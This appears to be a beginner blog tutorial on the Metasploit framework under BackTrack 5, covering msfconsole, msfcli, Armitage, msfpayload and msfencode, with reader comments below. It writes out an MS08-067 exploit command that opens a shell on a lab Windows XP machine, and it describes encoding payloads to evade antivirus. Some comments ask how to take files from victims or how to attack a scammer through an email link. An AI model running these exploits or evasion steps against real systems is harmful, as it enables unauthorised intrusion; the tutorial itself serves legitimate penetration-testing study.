Metasploit Tutorial: Introduction

  1. Metasploit Terms
  2. MSFconsole
  3. MSFcli
  4. Armitage
  5. MSFpayload
  6. MSFencode

Metasploit is a valuable tool in pen testing a network. However, it can be very confusing for a beginner. These metaspolit tutorials will help you get up and running with metasploit. Most of our hacking will be targeted to windows machines. As a reminder and site disclaimer: I am not responsible for your actions! This is for education only!

Recommended Reading: Metasploit: The Penetration Tester’s Guide

A Book that will show you most of the metasploit framework. However, it leaves you to discover the true power of metasploit for yourself. Overall, highly recommended.


Metasploit Terms

Exploit – to take advantage of a security flaw within a system, network, or application.
Payload - is code that our victim computer to execute by the metasploit framework.
Module - a small piece of code that can be added to the metasploit framework to execute an attack.
Shellcode – a small piece of code used as a payload.

MSFconsole

Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials, but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes installed by default on backtrack 5. To access msfconsole, open your console and type:

root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole

After sometime, the msfconsole will boot.

BackTrack Tutorials msfConsoleTo view the help files, simply type help followed by the command you want to know more about. In our case, we want to learn about the connect command. The connect command allows us to communicate with a host.

msf > help connect

MSFcli

Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability with other console-based tools. To view the msfcli help type:

root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli -h

backtrack tutorials msfcli helpNow we are going to do a little test run of msfcli. It’s important to note whenever you’re learning metasploit and you get stuck, you can see the options in a module by adding the letter O to the end of the line. For example:

root@bt:~# msfcli windows/smb/ms08_067_netapt o

backtrack tutorials cli oThis module requires three options: RHOST, RPORT, and SMPIPE. Adding P to the end allows us to see what payloads we can use.

root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P

we can run our exploit by selecting a payload, fill out the options, and run it by passing the letter E to the ned of the msfcli argument string.

root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E

MSF Example 1

Note: the IP address assigned to RHOST is a windows XP machine that I have on a virtaul machine. It will act as our victim machine for testing. You will have to do the same with another computer or a virtual machine. For practice, do not update your victim machine or install anti-virus. We want to be able to use our exploits without them being patched over with windows updates. We will go over this more in-depth later on.



The armitage component is a fully interactive graphical user interface.

Running Armitage

  1. Run the command armitage.
  2. Select Start MSF.

armitage_gui

MSFpayload

The msfpayload component of metasploit that generates shellcode, and executables. Shellcoe can bew generated in many formats including C, Ruby, JavaScript and even Visuabl Basic. Each output will be useful in various situations.

For msfpayload help type: root@bt~# msfpayload -h

Just like msfcli, if you need to find out the required options, append the letter O on the command line.

root@bt:~# msfpayload windows/shell_reverse_tcp O

MSFencode

The shellcode generated by msfpayload is functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion.

In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters.

Enter msfencode -h to see a list of msfencode options.

Metasploit contains a number of different encoders for different situations. Some will be useful when you can use only alphanumeric characters as part of a payload, as is the case with many file format exploits or other applications that accept only printable characters as input, while others are great general purpose encoders that do well in every situation. A very popular and well known encoder is the: x86/shikata_ga_nai encoder.

To see the list of encoders available, append -l to msfencode as shown next. The payloads are ranked in order of reliability.

root@bt:~# msfencode -l

backtrack tutorials metasploit encoder list

26 thoughts on “Metasploit Tutorial: Introduction

  1. Thanks for the details.
    Can you please tell me from where i get the victim machine windows XP SP0
    Vulnerable for testing using backtrack 5 R3.

  2. how i will transfer copy files from the victum computer/pc into my Backtrack or Windows, When i am in DOS command line from victim pc.. please let me know what the method to transfer of files after exploit.
    Regards Chimi

  3. There is an error when you talk about msfcli, you wrote “msfcli windows/smb/ms08_067_netapt o” whereas it’s netapi !!

  4. Hi,,,,,
    I am very impressed to know about your knowledge of backtrack and i also want to learn this,,,, so, if you can teach me them please contact with me on my mobile #. +971558873837. I will pay your fee

    Regards,
    Azhar Ali

  5. Hi
    when i use first command. ( root@bt: ~# cd /opt/framework3/msf3/ )
    its saying no such file or directory. what should i do for it.

  6. Well guys, first off nice tutorial……..Secondly how are people ever supposed to learn when twats like with the comment to pack the computer away and call them stupid! Bunch of cunts! Be civil and gain respect!

  7. hi, i have never used Metasploit, i got scammed recently(somebody stole money from me) and i was wondering how can metsploit work for my need: i got only the email of him(no ip) sending a link in his email , on click ..i get some info or a session? thanks would that be possible?thanks

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>